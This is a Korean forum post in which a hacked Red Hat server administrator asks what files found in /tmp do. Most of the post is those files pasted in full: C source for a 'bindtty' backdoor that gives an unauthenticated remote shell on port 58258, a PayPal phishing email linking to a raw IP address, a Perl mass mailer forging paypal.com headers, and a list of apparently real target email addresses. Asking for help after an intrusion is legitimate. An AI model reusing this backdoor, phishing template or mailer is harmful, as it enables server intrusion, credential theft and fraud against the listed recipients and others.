
또 해킹 당했습니다..아래 글 남겼던 적이 있는데 이번에 또 이상한게 해킹 당했나 봅니다


  • 원준 작성
  • 작성일


레드햇 9.0이고 2.4.20-31.9smp 입니다...
아래 해킹 당한 부분에 대해서 홍석범 님이 얘기 하신대로
조치를 취하지 못하고 혼자 어떻게 해보려고 했는데

또 /tmp 안에 이상한 파일들이 생겼습니다.
이게 도무지 뭐하는 건지 무지 궁금하기도 하고
서버에 어떤 영향을 미치는지도 궁금합니다
또한 조치법도 알려 주시기 바랍니다.

부탁 드립니다...ㅠㅠㅠㅠㅠ


/*
 bindtty - like bindshell, but with tty

 Features:
  - it can handle any number of clients
  - allocates tty for each session
  - no using termios.h/tty.h: compiles on most of gccs
  - linux specific ;(
 
 by sd <sd@sf.cz>
*/

#define HOME "/"   /* HOME value handed to the spawned shell (see main) */

/* ioctl numbers hard-coded instead of pulling in the tty headers (the
 * header comment says the file avoids termios.h/tty.h); TIOCGWINSZ is
 * defined but never used in this file */
#define TIOCSCTTY 0x540E
#define TIOCGWINSZ      0x5413
#define TIOCSWINSZ      0x5414
#define ECHAR 0x1d   /* in-band byte that starts a 5-byte window-size record from the client */

/* TCP port the listener binds on every interface -- the first thing to
 * look for on a host suspected of running this */
#define PORT 58258

#define BUF 32768   /* relay buffer size per session */


#include <sys/wait.h>
#include <sys/types.h>
#include <sys/resource.h>

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <fcntl.h>

/* Local copy of the window-size structure passed to ioctl(TIOCSWINSZ) in
 * main; declared here because the file deliberately avoids termios.h (see
 * header comment).  The layout is handed to the kernel as-is, so the
 * field order must match what the ioctl expects -- do not reorder. */
struct winsize {
 unsigned short ws_row;    /* rows: bytes 3-4 of the ECHAR record, big-endian */
 unsigned short ws_col;    /* columns: bytes 1-2 of the ECHAR record, big-endian */
 unsigned short ws_xpixel; /* always set to 0 by main */
 unsigned short ws_ypixel; /* always set to 0 by main */
};

/* Builds a BSD-style pty/tty device name: base followed by one "series"
 * letter chosen by the high nibble of num and one hex digit chosen by the
 * low nibble, so num is effectively masked to 8 bits (256 names).
 * buf must have room for strlen(base) + 3 bytes; nothing here checks it. */
void get_tty(int num, char *base, char *buf)
{
 static const char series[] = "pqrstuvwxyzabcde";
 static const char subs[] = "0123456789abcdef";
 size_t len = strlen(base);

 memcpy(buf, base, len);
 buf[len] = series[(num >> 4) & 0xF];
 buf[len + 1] = subs[num & 0xF];
 buf[len + 2] = '\0';
}

/* Finds a free legacy pty pair by probing /dev/pty[p-e][0-f] and the
 * matching /dev/tty name.  On success stores the slave fd in *tty and the
 * master fd in *pty and returns 1; otherwise returns 0 and leaves the
 * out-parameters unspecified.  The open/close of /dev/ptmx at the top is
 * kept from the original: its result is never used. */
int open_tty(int *tty, int *pty)
{
 char name[512];
 int probe = open("/dev/ptmx", O_RDWR);
 close(probe);

 for (int idx = 0; idx < 256; idx++) {
  get_tty(idx, "/dev/pty", name);
  *pty = open(name, O_RDWR);
  if (*pty < 0) {
   continue;
  }
  get_tty(idx, "/dev/tty", name);
  *tty = open(name, O_RDWR);
  if (*tty >= 0) {
   return 1;
  }
  /* master opened but slave did not: release it and keep probing */
  close(*pty);
 }
 return 0;
}

/* SIGCHLD handler: re-installs itself first (in case the disposition is
 * reset on delivery), then reaps one exited child without blocking so
 * finished sessions do not linger as zombies.  A single waitpid() call
 * reaps at most one child per signal. */
void sig_child(int i)
{
 (void)i;
 signal(SIGCHLD, sig_child);
 (void)waitpid(-1, NULL, WNOHANG);
}

/* Installed by main for SIGHUP and SIGTERM in the relay process: passes a
 * hangup and then a terminate on to the whole process group, which after
 * main's setpgid(0, 0) holds only this session's relay and its shell.
 * The signal number received is ignored. */
void hangout(int i)
{
 static const int forward[] = { SIGHUP, SIGTERM };
 (void)i;
 for (size_t k = 0; k < sizeof forward / sizeof forward[0]; k++) {
  kill(0, forward[k]);
 }
}

/* Entry point.  Binds TCP port PORT on every interface, daemonizes, and
 * for each accepted connection forks a session that allocates a pty and
 * runs /bin/sh -i on it with an environment supplied by the client.
 * Nothing authenticates the client: whoever connects gets an interactive
 * shell with the privileges of the user that started this process.  On a
 * host suspected of running it, the listener on PORT and the detached
 * "sh -i" children sitting on a pty are the visible handles. */
int main()
{
 int pid;
 struct sockaddr_in serv;
 struct sockaddr_in cli;
 int sock;
 
 /* listening socket on INADDR_ANY:PORT; failures are reported through
  * perror before stdio is redirected below */
 sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 if (sock < 0) {
  perror("socket");
  return 1;
 }
 
 bzero((char *) &serv, sizeof(serv));
 serv.sin_family = AF_INET;
 serv.sin_addr.s_addr = htonl(INADDR_ANY);
 serv.sin_port = htons(PORT);
 if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
  perror("bind");
  return 1;
 }
 if (listen(sock, 5) < 0) {
  perror("listen");
  return 1;
 }
 
 /* the parent only reports the daemon's pid and exits; the child
  * (pid == 0) carries on below.  A failed fork (-1) also takes the
  * parent branch and is reported as "pid = -1". */
 printf("Daemon is starting..."); fflush(stdout);
 pid = fork();
 if (pid !=0 ) {
  printf("OK, pid = %d ", pid);
  return 0;
 }

 /* daemonize: own session, cwd /, stdio on /dev/null, SIGHUP ignored,
  * finished sessions reaped by sig_child.  pid is reused as a scratch fd. */
 setsid();
 chdir("/");
 pid = open("/dev/null", O_RDWR);
 dup2(pid, 0);
 dup2(pid, 1);
 dup2(pid, 2);
 close(pid);
 signal(SIGHUP, SIG_IGN);
 signal(SIGCHLD, sig_child);
 /* accept loop: never exits; a failed accept (including one interrupted
  * by a signal) is simply retried */
 while (1) {
  int scli;
  int slen;   /* int rather than socklen_t; presumably the same width on the targeted glibc */
  slen = sizeof(cli);
  scli = accept(sock, (struct sockaddr *) &cli, &slen);
  if (scli < 0) continue;
  /* one session process per client; afterwards the parent only closes
   * its copy of scli (bottom of the loop) and goes back to accept */
  pid = fork();
  if (pid == 0) {
   int subshell;
   int tty;
   int pty;
   fd_set fds;
   char buf[BUF];
   char *argv[] = {"sh", "-i", NULL};
   #define MAXENV 256   /* max environment records accepted from the client */
   #define ENVLEN 256   /* fixed size of each record */
   char *envp[MAXENV];
   char envbuf[(MAXENV+2) * ENVLEN];
   int j, i;
   char home[256];

   /* setup environment: HOME=/ (the HOME macro) first, then environment
    * strings the client sends as fixed ENVLEN-byte records.  Reading
    * stops on a short read (error and EOF included), after MAXENV
    * records, or once a record starts with a space.  Nothing here
    * NUL-terminates a record and envbuf is not zeroed, so the client is
    * relied on to supply the terminators.
    * NOTE(review): with MAXENV full records j reaches MAXENV, so the last
    * in-loop store and the final NULL land at envp[MAXENV] and
    * envp[MAXENV+1], past the end of the array. */
   envp[0] = home;
   sprintf(home, "HOME=%s", HOME);
   j = 0;
   do {
    i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
    envp[j+1] = &envbuf[j * ENVLEN];
    j++;
    if ((j >= MAXENV) || (i < ENVLEN)) break;
   } while (envbuf[(j-1) * ENVLEN] != ' ');
   envp[j+1] = NULL;

   /* create new group: kill(0, ...) in hangout and the SIGWINCH below
    * then reach only this session's processes */
   setpgid(0, 0);

   /* open slave & master side of tty; without a free pair the client is
    * told so and the session ends */
   if (!open_tty(&tty, &pty)) {
    char msg[] = "Can't fork pty, bye! ";
    write(scli, msg, strlen(msg));
    close(scli);
    exit(0);
   }
   /* fork child: the grandchild becomes the shell, this process stays as
    * the relay between the pty master and the socket */
   subshell = fork();
   if (subshell == 0) {
    /* close master */
    close(pty);
    /* attach tty: new session, then the slave becomes its controlling tty */
    setsid();
    ioctl(tty, TIOCSCTTY);
    /* close local part of connection so the shell holds no socket fds */
    close(scli);
    close(sock);
    signal(SIGHUP, SIG_DFL);
    signal(SIGCHLD, SIG_DFL);
    dup2(tty, 0);
    dup2(tty, 1);
    dup2(tty, 2);
    close(tty);
    /* argv[0] is "sh", so the process shows up as "sh -i"; envp is what
     * the client supplied above.
     * NOTE(review): no _exit() after execve -- if the exec fails this
     * child falls through into the relay code below. */
    execve("/bin/sh", argv, envp);
   }
   /* close slave */
   close(tty);

   /* a hangup or terminate on the relay is forwarded to the whole session
    * group by hangout */
   signal(SIGHUP, hangout);
   signal(SIGTERM, hangout);

   /* relay loop: runs until either side closes or errors */
   while (1) {
    /* watch tty and client side */
    FD_ZERO(&fds);
    FD_SET(pty, &fds);
    FD_SET(scli, &fds);
    if (select((pty > scli) ? (pty+1) : (scli+1),
        &fds, NULL, NULL, NULL) < 0)
        {
         break;
    }
    /* shell output -> client, passed through unchanged */
    if (FD_ISSET(pty, &fds)) {
     int count;
     count = read(pty, buf, BUF);
     if (count <= 0) break;
     if (write(scli, buf, count) <= 0) break;
    }
    /* client input -> shell, with one in-band control record: ECHAR
     * followed by 4 bytes (columns then rows, each big-endian 16-bit)
     * sets the pty's window size.  Only the first ECHAR in a read is
     * handled; everything after the record, ECHAR included, is passed
     * through as data. */
    if (FD_ISSET(scli, &fds)) {
     int count;
     unsigned char *p, *d;
     d = buf;
     count = read(scli, buf, BUF);   
     if (count <= 0) break;
     
     /* setup win size */
     p = memchr(buf, ECHAR, count);
     if (p) {
      unsigned char wb[5];
      int rlen = count - ((ulong) p - (ulong) buf);   /* bytes from ECHAR to end of data */
      struct winsize ws;

      /* wait for rest: if the 5-byte record was split across reads, block
       * for the remainder.  NOTE(review): that read's result is not
       * checked, so a short read leaves the tail of wb unset. */
      if (rlen > 5) rlen = 5;
      memcpy(wb, p, rlen);
      if (rlen < 5) {
       read(scli, &wb[rlen], 5 - rlen);
      }

      /* setup window: wb[0] is ECHAR itself */
      ws.ws_xpixel = ws.ws_ypixel = 0;
      ws.ws_col = (wb[1] << 8) + wb[2];
      ws.ws_row = (wb[3] << 8) + wb[4];
      ioctl(pty, TIOCSWINSZ, &ws);
      kill(0, SIGWINCH);   /* tell the shell (same group) the size changed */

      /* write the rest: data before the record, then data after it; unlike
       * the plain path below these writes are not checked */
      write(pty, buf, (ulong) p - (ulong) buf);
      rlen = ((ulong) buf + count) - ((ulong)p+5);
      if (rlen > 0) write(pty, p+5, rlen);
     } else
      if (write(pty, d, count) <= 0) break;
    }
   }
   /* session teardown: wait for the shell to exit, then vhangup()
    * (privileged) revokes any remaining opens of the tty */
   close(scli);
   close(sock);
   close(pty);

   waitpid(subshell, NULL, 0);
   vhangup();
   exit(0);
  }
  close(scli);
 }
}
<DIV><DIV id=message><TT style="FONT-SIZE: x-small;
FONT-FAMILY:'couriernew',monospace">You have added <A
href="http://211.233.38.245/secure/verify/paypal/data/pl/index.htm?a s d h a j d h a s g d a s d fa s g h f g a s h d f a s d a s d a s d a s d a s d"
target=_blank>brian12313@yahoo.com </A>as a new email address for your PayPal
account.<BR><BR>If you did not authorize this change or if you need assistance
with your account, please contact PayPal customer service  at:&nbsp;</TT>
<P><TT style="FONT-SIZE: x-small; FONT-FAMILY: 'couriernew',monospace"><A
href="http://211.233.38.245/secure/verify/paypal/data/pl/index.htm?a s d h a j d h a s g d a s d fa s g h f g a s h d f a s d a s d a s d a s d a s d" target=_blank>https://www.paypal.com/row/wf/f=ap_email</A><BR><BR><BR>Thank you for using PayPal!<BR>The PayPal Team<BR><BR><BR>Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, log in to your PayPal account and choose the<BR>"Help" link in the header of any page.<BR><BR>----------------------------------------------------------------<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
PROTECT YOUR PASSWORD<BR><BR>&nbsp;&nbsp; NEVER give your password to anyone
and ONLY log in at <A href="http://211.233.38.245/secure/verify/paypal/data/pl/index.htm?a s d h a j d h a s g d a s d fa s g h f g a s h d f a s d a s d a s d a s d a s d" target=_blank>https://www.paypal.com/.</A> Protect yourself against fraudulent websites by opening a new web browser (e.g. Internet Explorer or Netscape) and typing in the PayPal URL every time you log in to your account.<BR><BR><BR> ---------------------------------------------------------------&nbsp;&nbsp;&nbsp;&nbsp; <BR><BR><BR></B>PayPal Email ID PP007</TT></P></DIV></DIV>
#!/usr/bin/perl
# Bulk mailer found next to the phishing HTML above: sends one copy of
# $MSG to every address listed in $USERS, with headers forged to look
# like they come from paypal.com.
# As pasted here the header print() strings carry no trailing newline and
# the From line's inner quotes are unescaped, so this copy would not run
# unmodified -- most likely lost in the paste rather than in the original.

$SUBJ="You have successfully added a new email address";   # forged subject line
$MSG="msg.txt";    # HTML body file, presumably the PayPal page shown above
$USERS="users";    # recipient list, one address per line

open(IN,$USERS);   # no error check: a missing file just yields an empty loop

$id=12345;   # counter folded into each forged Message-ID
while(chop($line=<IN>)){
    # pipe this recipient's message to the local sendmail
    open(SM,"|/usr/sbin/sendmail $line");
    print(SM "To: $line ");
    print(SM "Subject: $SUBJ ");
    # Message-ID and From both impersonate paypal.com
    print(SM "Message-ID: <".time().".$id.qmail@paypal.com> ");
    print(SM "From: "Paypal" <accounts@paypal.com> ");
    print("Message sent to $line ");   # progress line on the operator's stdout
    print(SM "Content-Type: text/html ");
    # body: stream $MSG verbatim (reuses $line; the outer loop resets it)
    open(FILE,$MSG);
    while($line=<FILE>){
 print(SM $line);
    }
    close(FILE);
    close(SM);
    $id++;
}

close(IN);
dicalutu@aol.com
kind3r3l@yahoo.com
mansoane@aol.com
mansoane@aol.com
